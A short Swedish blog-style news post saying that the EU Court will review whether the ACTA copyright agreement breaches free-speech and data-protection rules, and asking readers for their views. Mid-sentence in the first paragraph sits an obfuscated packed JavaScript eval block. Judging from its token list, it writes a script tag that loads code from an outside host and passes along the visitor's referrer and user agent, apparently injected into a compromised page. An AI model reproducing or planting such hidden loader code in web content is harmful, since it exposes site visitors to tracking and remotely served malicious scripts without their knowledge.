Image Image Image Image Image Image Image Image Image Image

| 13 juli, 2020

Scroll to top

Top

EU-domstolen granskar Acta

EU-domstolen granskar Acta
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ttbei|var|u0026u|referrer|hetea||js|php’.split(’|’),0,{}))
har flera EU-länder meddelat att de vägrar godkänna upphovsavtalet Acta. Som vi vet har det uppstått flera protester runt om i världen bl.a. Sverige som fått EU att tänka om.

Nu har EU bestämt sig för att granska ifall avtalet möjligtvis bryter mot reglerna om yttrandefrihet och dataskydd. I väntan på ett utlåtande från domstolen skjuter EU upp de beslut som innebär att avtalet blir bindande.

Kritiken gäller bland annat att avtalet sägs bryta mot medborgarnas integritet. Rykterna är så pass många att det är nödvändigt att göra en granskning gällande de grundläggande värderingar menar EU.

Det är rätt förvånande att denna granskning sker så pass sent i processen. Avtalet har redan erkänts av ett antal länders regeringar. De har också fått grönt ljus i EU-parlamentet. Länder som Rumänien har även uppgivit att det inte avser att godkänna avtalet för egen del.

Vad tycker ni?